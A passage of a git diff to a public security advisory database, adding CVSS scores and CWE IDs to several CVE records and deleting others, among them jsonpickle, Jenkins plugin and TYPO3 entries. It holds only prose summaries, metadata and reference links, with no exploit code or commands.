b/advisories/unreviewed/2022/05/GHSA-j2rp-vprg-5m9q/GHSA-j2rp-vprg-5m9q.json index 9cf4c8f0fda31..bd1fb59f259f0 100644 --- a/advisories/unreviewed/2022/05/GHSA-j2rp-vprg-5m9q/GHSA-j2rp-vprg-5m9q.json +++ b/advisories/unreviewed/2022/05/GHSA-j2rp-vprg-5m9q/GHSA-j2rp-vprg-5m9q.json @@ -44,7 +44,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-285" + "CWE-285", + "CWE-918" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-j66q-qmrc-89rx/GHSA-j66q-qmrc-89rx.json b/advisories/unreviewed/2022/05/GHSA-j66q-qmrc-89rx/GHSA-j66q-qmrc-89rx.json deleted file mode 100644 index 3ba367e45c4c9..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-j66q-qmrc-89rx/GHSA-j66q-qmrc-89rx.json +++ /dev/null @@ -1,55 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-j66q-qmrc-89rx", - "modified": "2022-05-24T17:36:44Z", - "published": "2022-05-24T17:36:44Z", - "aliases": [ - "CVE-2020-22083" - ], - "details": "jsonpickle through 1.4.1 allows remote code execution during deserialization of a malicious payload through the decode() function.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-22083" - }, - { - "type": "WEB", - "url": "https://github.com/jsonpickle/jsonpickle/issues/332" - }, - { - "type": "WEB", - "url": "https://github.com/jsonpickle/jsonpickle/issues/332#issuecomment-747807494" - }, - { - "type": "WEB", - "url": "https://access.redhat.com/security/cve/CVE-2020-22083" - }, - { - "type": "WEB", - "url": "https://gist.github.com/j0lt-github/bb543e77a1a10c33cb56cf23d0837874" - }, - { - "type": "WEB", - "url": "https://github.com/j0lt-github/python-deserialization-attack-payload-generator" - }, - { - "type": "WEB", - "url": "https://versprite.com/blog/application-security/into-the-jar-jsonpickle-exploitation/" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-502" - ], - "severity": "CRITICAL", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2020-12-17T16:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-jcmg-9rw5-9rm2/GHSA-jcmg-9rw5-9rm2.json b/advisories/unreviewed/2022/05/GHSA-jcmg-9rw5-9rm2/GHSA-jcmg-9rw5-9rm2.json deleted file mode 100644 index 8d2cfcbfb5263..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-jcmg-9rw5-9rm2/GHSA-jcmg-9rw5-9rm2.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-jcmg-9rw5-9rm2", - "modified": "2022-05-13T01:30:26Z", - "published": "2022-05-13T01:30:26Z", - "aliases": [ - "CVE-2018-1000426" - ], - "details": "A cross-site scripting vulnerability exists in Jenkins Git Changelog Plugin 2.6 and earlier in GitChangelogSummaryDecorator/summary.jelly, GitChangelogLeftsideBuildDecorator/badge.jelly, GitLogJiraFilterPostPublisher/config.jelly, GitLogBasicChangelogPostPublisher/config.jelly that allows attackers able to control the Git history parsed by the plugin to have Jenkins render arbitrary HTML on some pages.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000426" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2018-09-25/#SECURITY-1122" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/106532" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-01-09T23:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-jcp3-xfrr-gf86/GHSA-jcp3-xfrr-gf86.json b/advisories/unreviewed/2022/05/GHSA-jcp3-xfrr-gf86/GHSA-jcp3-xfrr-gf86.json index 011423a75cb39..8e5651265ca0d 100644 --- a/advisories/unreviewed/2022/05/GHSA-jcp3-xfrr-gf86/GHSA-jcp3-xfrr-gf86.json +++ b/advisories/unreviewed/2022/05/GHSA-jcp3-xfrr-gf86/GHSA-jcp3-xfrr-gf86.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-jcp3-xfrr-gf86", - "modified": "2022-05-02T03:29:05Z", + "modified": "2024-02-02T18:30:21Z", "published": "2022-05-02T03:29:05Z", "aliases": [ "CVE-2009-1837" ], "details": "Race condition in the NPObjWrapper_NewResolve function in modules/plugin/base/src/nsJSNPRuntime.cpp in xul.dll in Mozilla Firefox 3 before 3.0.11 might allow remote attackers to execute arbitrary code via a page transition during Java applet loading, related to a use-after-free vulnerability for memory associated with a destroyed Java object.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ diff --git a/advisories/unreviewed/2022/05/GHSA-jfj9-7j5w-6xgx/GHSA-jfj9-7j5w-6xgx.json b/advisories/unreviewed/2022/05/GHSA-jfj9-7j5w-6xgx/GHSA-jfj9-7j5w-6xgx.json deleted file mode 100644 index ae92a7bbbe3e3..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-jfj9-7j5w-6xgx/GHSA-jfj9-7j5w-6xgx.json +++ /dev/null @@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-jfj9-7j5w-6xgx", - "modified": "2022-05-14T03:46:09Z", - "published": "2022-05-14T03:46:09Z", - "aliases": [ - "CVE-2018-1000009" - ], - "details": "Jenkins Checkstyle Plugin 3.49 and earlier processes XML external entities in files it parses as part of the build process, allowing attackers with user permissions in Jenkins to extract secrets from the Jenkins master, perform server-side request forgery, or denial-of-service attacks.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000009" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2018-01-22/" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-611" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2018-01-23T14:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-jhxw-fqxp-j75j/GHSA-jhxw-fqxp-j75j.json b/advisories/unreviewed/2022/05/GHSA-jhxw-fqxp-j75j/GHSA-jhxw-fqxp-j75j.json index 8f81dcf7db191..67e640ac1e047 100644 --- a/advisories/unreviewed/2022/05/GHSA-jhxw-fqxp-j75j/GHSA-jhxw-fqxp-j75j.json +++ b/advisories/unreviewed/2022/05/GHSA-jhxw-fqxp-j75j/GHSA-jhxw-fqxp-j75j.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-jhxw-fqxp-j75j", - "modified": "2022-05-01T17:52:04Z", + "modified": "2024-02-02T15:30:27Z", "published": "2022-05-01T17:52:04Z", "aliases": [ "CVE-2007-1285" ], "details": "The Zend Engine in PHP 4.x before 4.4.7, and 5.x before 5.2.2, allows remote attackers to cause a denial of service (stack exhaustion and PHP crash) via deeply nested arrays, which trigger deep recursion in the variable destruction routines.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -173,7 +176,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-674" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-jjg3-cx5h-88wm/GHSA-jjg3-cx5h-88wm.json b/advisories/unreviewed/2022/05/GHSA-jjg3-cx5h-88wm/GHSA-jjg3-cx5h-88wm.json index 93b845de14a5c..97352ab56f9ef 100644 --- a/advisories/unreviewed/2022/05/GHSA-jjg3-cx5h-88wm/GHSA-jjg3-cx5h-88wm.json +++ b/advisories/unreviewed/2022/05/GHSA-jjg3-cx5h-88wm/GHSA-jjg3-cx5h-88wm.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-jjg3-cx5h-88wm", - "modified": "2022-05-17T05:45:28Z", + "modified": "2024-02-02T18:30:22Z", "published": "2022-05-17T05:45:28Z", "aliases": [ "CVE-2010-2547" ], "details": "Use-after-free vulnerability in kbx/keybox-blob.c in GPGSM in GnuPG 2.x through 2.0.16 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a certificate with a large number of Subject Alternate Names, which is not properly handled in a realloc operation when importing the certificate or verifying its signature.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -105,7 +108,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-416" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-jp4r-pf5r-4wg8/GHSA-jp4r-pf5r-4wg8.json b/advisories/unreviewed/2022/05/GHSA-jp4r-pf5r-4wg8/GHSA-jp4r-pf5r-4wg8.json deleted file mode 100644 index e4b531c2217a5..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-jp4r-pf5r-4wg8/GHSA-jp4r-pf5r-4wg8.json +++ /dev/null @@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-jp4r-pf5r-4wg8", - "modified": "2022-05-13T01:25:43Z", - "published": "2022-05-13T01:25:43Z", - "aliases": [ - "CVE-2019-1003080" - ], - "details": "A cross-site request forgery vulnerability in Jenkins OpenShift Deployer Plugin in the DeployApplication.DeployApplicationDescriptor#doCheckLogin form validation method allows attackers to initiate a connection to an attacker-specified server.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003080" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-981" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/107790" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-352" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-04-04T16:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-jr38-ch73-ccgx/GHSA-jr38-ch73-ccgx.json b/advisories/unreviewed/2022/05/GHSA-jr38-ch73-ccgx/GHSA-jr38-ch73-ccgx.json index dfe3e4efd8a12..ed5dfa2906012 100644 --- a/advisories/unreviewed/2022/05/GHSA-jr38-ch73-ccgx/GHSA-jr38-ch73-ccgx.json +++ b/advisories/unreviewed/2022/05/GHSA-jr38-ch73-ccgx/GHSA-jr38-ch73-ccgx.json @@ -33,10 +33,18 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00003.html" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZXCI33HXH6YSOGC2LPE2REQLMIDH6US4/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZXCI33HXH6YSOGC2LPE2REQLMIDH6US4/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-32" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5490" diff --git a/advisories/unreviewed/2022/05/GHSA-jr79-65xr-q7cx/GHSA-jr79-65xr-q7cx.json b/advisories/unreviewed/2022/05/GHSA-jr79-65xr-q7cx/GHSA-jr79-65xr-q7cx.json deleted file mode 100644 index 867f2470af108..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-jr79-65xr-q7cx/GHSA-jr79-65xr-q7cx.json +++ /dev/null @@ -1,54 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-jr79-65xr-q7cx", - "modified": "2022-05-17T00:26:03Z", - "published": "2022-05-17T00:26:03Z", - "aliases": [ - "CVE-2010-3659" - ], - "details": "Multiple cross-site scripting (XSS) vulnerabilities in TYPO3 CMS 4.1.x before 4.1.14, 4.2.x before 4.2.13, 4.3.x before 4.3.4, and 4.4.x before 4.4.1 allow remote authenticated backend users to inject arbitrary web script or HTML via unspecified parameters to the extension manager, or unspecified parameters to unknown backend forms.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3659" - }, - { - "type": "WEB", - "url": "https://security-tracker.debian.org/tracker/CVE-2010-3659/" - }, - { - "type": "WEB", - "url": "https://typo3.org/teams/security/security-bulletins/typo3-core/typo3-sa-2010-012/" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2010/09/28/8" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2014/02/12/8" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/42029" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2017-10-20T18:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-jrv6-p293-phjx/GHSA-jrv6-p293-phjx.json b/advisories/unreviewed/2022/05/GHSA-jrv6-p293-phjx/GHSA-jrv6-p293-phjx.json index 19fef064292f7..b57c1b1f443c6 100644 --- a/advisories/unreviewed/2022/05/GHSA-jrv6-p293-phjx/GHSA-jrv6-p293-phjx.json +++ b/advisories/unreviewed/2022/05/GHSA-jrv6-p293-phjx/GHSA-jrv6-p293-phjx.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-jrv6-p293-phjx", - "modified": "2022-05-01T01:57:13Z", + "modified": "2024-02-08T21:30:31Z", "published": "2022-05-01T01:57:13Z", "aliases": [ "CVE-2005-1306" ], "details": "The Adobe Reader control in Adobe Reader and Acrobat 7.0 and 7.0.1 allows remote attackers to determine the existence of files via Javascript containing XML script, aka the \"XML External Entity vulnerability.\"", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -29,7 +32,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-611" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-jvw4-xfqp-q5qh/GHSA-jvw4-xfqp-q5qh.json b/advisories/unreviewed/2022/05/GHSA-jvw4-xfqp-q5qh/GHSA-jvw4-xfqp-q5qh.json index 83cd8828d8ff3..c58a05f647006 100644 --- a/advisories/unreviewed/2022/05/GHSA-jvw4-xfqp-q5qh/GHSA-jvw4-xfqp-q5qh.json +++ b/advisories/unreviewed/2022/05/GHSA-jvw4-xfqp-q5qh/GHSA-jvw4-xfqp-q5qh.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-jvw4-xfqp-q5qh", - "modified": "2022-05-01T23:58:42Z", + "modified": "2024-02-08T03:32:44Z", "published": "2022-05-01T23:58:42Z", "aliases": [ "CVE-2008-3282" ], "details": "Integer overflow in the rtl_allocateMemory function in sal/rtl/source/alloc_global.c in the memory allocator in OpenOffice.org (OOo) 2.4.1, on 64-bit platforms, allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted document, related to a \"numeric truncation error,\" a different vulnerability than CVE-2008-2152.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -77,7 +80,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-681" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-jxfp-4rvq-9h9m/GHSA-jxfp-4rvq-9h9m.json b/advisories/unreviewed/2022/05/GHSA-jxfp-4rvq-9h9m/GHSA-jxfp-4rvq-9h9m.json deleted file mode 100644 index 3b26930b69944..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-jxfp-4rvq-9h9m/GHSA-jxfp-4rvq-9h9m.json +++ /dev/null @@ -1,58 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-jxfp-4rvq-9h9m", - "modified": "2022-11-25T21:30:26Z", - "published": "2022-05-24T17:34:40Z", - "aliases": [ - "CVE-2020-28975" - ], - "details": "svm_predict_values in svm.cpp in Libsvm v324, as used in scikit-learn 0.23.2 and other products, allows attackers to cause a denial of service (segmentation fault) via a crafted model SVM (introduced via pickle, json, or any other model permanence standard) with a large value in the _n_support array.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28975" - }, - { - "type": "WEB", - "url": "https://github.com/scikit-learn/scikit-learn/issues/18891" - }, - { - "type": "WEB", - "url": "https://github.com/scikit-learn/scikit-learn/commit/1bf13d567d3cd74854aa8343fd25b61dd768bb85" - }, - { - "type": "WEB", - "url": "https://github.com/cjlin1/libsvm/blob/9a3a9708926dec87d382c43b203f2ca19c2d56a0/svm.cpp#L2501" - }, - { - "type": "WEB", - "url": "https://security.gentoo.org/glsa/202301-03" - }, - { - "type": "WEB", - "url": "http://packetstormsecurity.com/files/160281/SciKit-Learn-0.23.2-Denial-Of-Service.html" - }, - { - "type": "WEB", - "url": "http://seclists.org/fulldisclosure/2020/Nov/44" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2020-11-21T21:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-m25m-5778-fm22/GHSA-m25m-5778-fm22.json b/advisories/unreviewed/2022/05/GHSA-m25m-5778-fm22/GHSA-m25m-5778-fm22.json deleted file mode 100644 index 17bd0947e9a24..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-m25m-5778-fm22/GHSA-m25m-5778-fm22.json +++ /dev/null @@ -1,67 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-m25m-5778-fm22", - "modified": "2022-05-24T17:16:52Z", - "published": "2022-05-24T17:16:52Z", - "aliases": [ - "CVE-2020-12459" - ], - "details": "In certain Red Hat packages for Grafana 6.x through 6.3.6, the configuration files /etc/grafana/grafana.ini and /etc/grafana/ldap.toml (which contain a secret_key and a bind_password) are world readable.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-12459" - }, - { - "type": "WEB", - "url": "https://github.com/grafana/grafana/issues/8283" - }, - { - "type": "WEB", - "url": "https://access.redhat.com/security/cve/CVE-2020-12459" - }, - { - "type": "WEB", - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1827765" - }, - { - "type": "WEB", - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1829724" - }, - { - "type": "WEB", - "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CTQCKJZZYXMCSHJFZZ3YXEO5NUBANGZS/" - }, - { - "type": "WEB", - "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WEBCIEVSYIDDCA7FTRS2IFUOYLIQU34A/" - }, - { - "type": "WEB", - "url": "https://security.netapp.com/advisory/ntap-20200518-0004/" - }, - { - "type": "WEB", - "url": "https://src.fedoraproject.org/rpms/grafana/c/fab93d67363eb0a9678d9faf160cc88237f26277" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-200", - "CWE-732" - ], - "severity": "LOW", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2020-04-29T16:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-m2hm-f4mr-r66g/GHSA-m2hm-f4mr-r66g.json b/advisories/unreviewed/2022/05/GHSA-m2hm-f4mr-r66g/GHSA-m2hm-f4mr-r66g.json index a1660651b38d0..713cdd12aa43f 100644 --- a/advisories/unreviewed/2022/05/GHSA-m2hm-f4mr-r66g/GHSA-m2hm-f4mr-r66g.json +++ b/advisories/unreviewed/2022/05/GHSA-m2hm-f4mr-r66g/GHSA-m2hm-f4mr-r66g.json @@ -33,7 +33,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-770" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-m46p-rp8x-x8c4/GHSA-m46p-rp8x-x8c4.json b/advisories/unreviewed/2022/05/GHSA-m46p-rp8x-x8c4/GHSA-m46p-rp8x-x8c4.json deleted file mode 100644 index 9928c8f655fee..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-m46p-rp8x-x8c4/GHSA-m46p-rp8x-x8c4.json +++ /dev/null @@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-m46p-rp8x-x8c4", - "modified": "2022-05-13T01:25:16Z", - "published": "2022-05-13T01:25:16Z", - "aliases": [ - "CVE-2019-1003081" - ], - "details": "A missing permission check in Jenkins OpenShift Deployer Plugin in the DeployApplication.DeployApplicationDescriptor#doCheckLogin form validation method allows attackers with Overall/Read permission to initiate a connection to an attacker-specified server.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003081" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-981" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/107790" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-862" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-04-04T16:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-m5jc-6mwc-7vc7/GHSA-m5jc-6mwc-7vc7.json b/advisories/unreviewed/2022/05/GHSA-m5jc-6mwc-7vc7/GHSA-m5jc-6mwc-7vc7.json index 5b4b22e9b75cc..bed7b920417c0 100644 --- a/advisories/unreviewed/2022/05/GHSA-m5jc-6mwc-7vc7/GHSA-m5jc-6mwc-7vc7.json +++ b/advisories/unreviewed/2022/05/GHSA-m5jc-6mwc-7vc7/GHSA-m5jc-6mwc-7vc7.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-m5jc-6mwc-7vc7", - "modified": "2022-05-17T01:04:52Z", + "modified": "2024-02-03T03:30:26Z", "published": "2022-05-17T01:04:52Z", "aliases": [ "CVE-2010-2753" ], "details": "Integer overflow in Mozilla Firefox 3.5.x before 3.5.11 and 3.6.x before 3.6.7, Thunderbird 3.0.x before 3.0.6 and 3.1.x before 3.1.1, and SeaMonkey before 2.0.6 allows remote attackers to execute arbitrary code via a large selection attribute in a XUL tree element, which triggers a use-after-free.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -49,7 +52,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-190" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-m65m-xrgm-j736/GHSA-m65m-xrgm-j736.json b/advisories/unreviewed/2022/05/GHSA-m65m-xrgm-j736/GHSA-m65m-xrgm-j736.json index 52081fd263dc3..976f8e3023185 100644 --- a/advisories/unreviewed/2022/05/GHSA-m65m-xrgm-j736/GHSA-m65m-xrgm-j736.json +++ b/advisories/unreviewed/2022/05/GHSA-m65m-xrgm-j736/GHSA-m65m-xrgm-j736.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-m65m-xrgm-j736", - "modified": "2022-05-01T01:48:04Z", + "modified": "2024-02-02T03:30:30Z", "published": "2022-05-01T01:48:04Z", "aliases": [ "CVE-2005-0269" ], "details": "The file extension check in GNUBoard 3.40 and earlier only verifies extensions that contain all lowercase letters, which allows remote attackers to upload arbitrary files via file extensions that include uppercase letters.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -37,7 +40,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-178" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-m68x-cc2f-gr5h/GHSA-m68x-cc2f-gr5h.json b/advisories/unreviewed/2022/05/GHSA-m68x-cc2f-gr5h/GHSA-m68x-cc2f-gr5h.json deleted file mode 100644 index 2a47681b287c9..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-m68x-cc2f-gr5h/GHSA-m68x-cc2f-gr5h.json +++ /dev/null @@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-m68x-cc2f-gr5h", - "modified": "2022-05-13T01:40:54Z", - "published": "2022-05-13T01:40:54Z", - "aliases": [ - "CVE-2017-1000095" - ], - "details": "The default whitelist included the following unsafe entries: DefaultGroovyMethods.putAt(Object, String, Object); DefaultGroovyMethods.getAt(Object, String). These allowed circumventing many of the access restrictions implemented in the script sandbox by using e.g. currentBuild['rawBuild'] rather than currentBuild.rawBuild. Additionally, the following entries allowed accessing private data that would not be accessible otherwise due to script security: groovy.json.JsonOutput.toJson(Closure); groovy.json.JsonOutput.toJson(Object).", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000095" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2017-07-10/" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-732" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2017-10-05T01:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-m7rg-85g8-28m9/GHSA-m7rg-85g8-28m9.json b/advisories/unreviewed/2022/05/GHSA-m7rg-85g8-28m9/GHSA-m7rg-85g8-28m9.json deleted file mode 100644 index 70e11da758d0f..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-m7rg-85g8-28m9/GHSA-m7rg-85g8-28m9.json +++ /dev/null @@ -1,59 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-m7rg-85g8-28m9", - "modified": "2022-05-02T03:47:10Z", - "published": "2022-05-02T03:47:10Z", - "aliases": [ - "CVE-2009-3633" - ], - "details": "Cross-site scripting (XSS) vulnerability in the t3lib_div::quoteJSvalue API function in TYPO3 4.0.13 and earlier, 4.1.x before 4.1.13, 4.2.x before 4.2.10, and 4.3.x before 4.3beta2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to the sanitizing algorithm.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-3633" - }, - { - "type": "WEB", - "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/53925" - }, - { - "type": "WEB", - "url": "http://marc.info/?l=oss-security&m=125632856206736&w=2" - }, - { - "type": "WEB", - "url": "http://marc.info/?l=oss-security&m=125633199111438&w=2" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/37122" - }, - { - "type": "WEB", - "url": "http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-016/" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/36801" - }, - { - "type": "WEB", - "url": "http://www.vupen.com/english/advisories/2009/3009" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-352" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2009-11-02T15:30:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-m9m5-q9x5-6877/GHSA-m9m5-q9x5-6877.json b/advisories/unreviewed/2022/05/GHSA-m9m5-q9x5-6877/GHSA-m9m5-q9x5-6877.json index 11511b82bb152..0d9f9c0f4f9d8 100644 --- a/advisories/unreviewed/2022/05/GHSA-m9m5-q9x5-6877/GHSA-m9m5-q9x5-6877.json +++ b/advisories/unreviewed/2022/05/GHSA-m9m5-q9x5-6877/GHSA-m9m5-q9x5-6877.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": 